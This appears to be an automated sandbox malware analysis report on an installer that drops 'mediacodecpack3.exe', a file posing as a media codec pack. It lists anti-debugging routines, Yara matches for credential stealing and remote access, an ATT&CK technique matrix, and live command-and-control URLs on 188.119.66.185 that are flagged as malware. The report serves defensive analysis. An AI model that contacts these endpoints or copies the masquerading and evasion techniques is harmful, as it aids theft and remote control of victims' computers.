                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B78
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeThread delayed: delay time: 60000Jump to behavior
                    Source: mediacodecpack3.exe, 00000002.00000002.2981066269.00000000007C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: mediacodecpack3.exe, 00000002.00000002.2982383221.0000000003350000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack3.exe, 00000002.00000002.2981066269.00000000008BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\steel.exe.3.exeAPI call chain: ExitProcess graph end nodegraph_0-6764
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeAPI call chain: ExitProcess graph end nodegraph_2-61260
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_2-61668
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_0040D6B9 rdtsc 2_2_0040D6B9
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02BA3A08 IsDebuggerPresent,2_2_02BA3A08
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02BAE6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,2_2_02BAE6BE
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02B95E5E RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,2_2_02B95E5E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02BA80E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_02BA80E8
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478504
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E09C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02B9E85F cpuid 2_2_02B9E85F
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: GetLocaleInfoA,0_2_0040520C
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: GetLocaleInfoA,0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: GetLocaleInfoA,1_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: GetLocaleInfoA,1_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004585C8
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0045559C GetUserNameA,1_2_0045559C
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.2981856828.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mediacodecpack3.exe PID: 5544, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.2981856828.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mediacodecpack3.exe PID: 5544, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,2_2_609660FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,2_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,2_2_60963143
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,2_2_6096923E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,2_2_6096A38C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,2_2_6096748C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,2_2_609254B1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_6094B407
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6090F435 sqlite3_bind_parameter_index,2_2_6090F435
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,2_2_609255D4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609255FF sqlite3_bind_text,2_2_609255FF
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,2_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,2_2_6094B54C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,2_2_60925686
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,2_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,2_2_609256E5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,2_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6092562A sqlite3_bind_blob,2_2_6092562A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,2_2_60925655
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_6094C64A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,2_2_609687A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,2_2_6092570B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095F772
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,2_2_60925778
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6090577D sqlite3_bind_parameter_name,2_2_6090577D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,2_2_6094B764
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6090576B sqlite3_bind_parameter_count,2_2_6090576B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,2_2_6094A894
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095F883
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,2_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,2_2_6096281E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,2_2_6096583A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,2_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6094A92B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6090EAE5 sqlite3_transfer_bindings,2_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_6095FB98
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,2_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,2_2_60966DF1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_60969D75
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,2_2_6095FFB2
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    5
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Obfuscated Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution
                    1
                    Bootkit
                    1
                    Access Token Manipulation
                    21
                    Software Packing
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
                    Windows Service
                    1
                    DLL Side-Loading
                    NTDS135
                    System Information Discovery
                    Distributed Component Object ModelInput Capture1
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets251
                    Security Software Discovery
                    SSHKeylogging12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync121
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Process Injection
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Bootkit
                    /etc/passwd and /etc/shadow3
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe100%Joe Sandbox ML
                    C:\ProgramData\MediaCodecPack\MediaCodecPack.exe100%Joe Sandbox ML
                    C:\ProgramData\MediaCodecPack\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\gdiplus.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-0BJ08.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-5V918.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-CJLSG.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-SHN24.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-UGFNO.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\msvcp71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\msvcr71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\sqlite3.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_setup64.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://188.119.66.185/ography0%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261cda3088100%Avira URL Cloudmalware
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325100%Avira URL Cloudmalware
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4100%Avira URL Cloudmalware
                    https://188.119.66.185/A654B8DF3C4585F17B60DA6690D18421A0182C80%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459100%Avira URL Cloudmalware
                    http://wonderwork.ucoz.com/0%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261cda3088false
                    • Avira URL Cloud: malware
                    unknown
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459false
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.innosetup.com/steel.exe.3.tmp, steel.exe.3.tmp, 00000001.00000000.1732720470.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-67S07.tmp.1.dr, steel.exe.3.tmp.0.drfalse
                      high
                      https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325mediacodecpack3.exe, 00000002.00000002.2981066269.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack3.exe, 00000002.00000002.2981066269.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://www.remobjects.com/psUsteel.exe.3.exe, 00000000.00000003.1732080677.0000000002168000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000003.1731820756.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000000.1732720470.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-67S07.tmp.1.dr, steel.exe.3.tmp.0.drfalse
                        high
                        https://188.119.66.185/priseCertificatesmediacodecpack3.exe, 00000002.00000002.2981066269.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://188.119.66.185/ographymediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUsteel.exe.3.exefalse
                            high
                            https://188.119.66.185/rosoftmediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://188.119.66.185/mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://188.119.66.185/en-GBmediacodecpack3.exe, 00000002.00000002.2981066269.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinesteel.exe.3.exefalse
                                    high
                                    http://wonderwork.ucoz.com/steel.exe.3.tmp, 00000001.00000002.2981700405.0000000005C8C000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack3.exe, 00000002.00000000.1743322718.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, mediacodecpack3.exe.1.dr, MediaCodecPack.exe.2.dr, is-VED6B.tmp.1.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
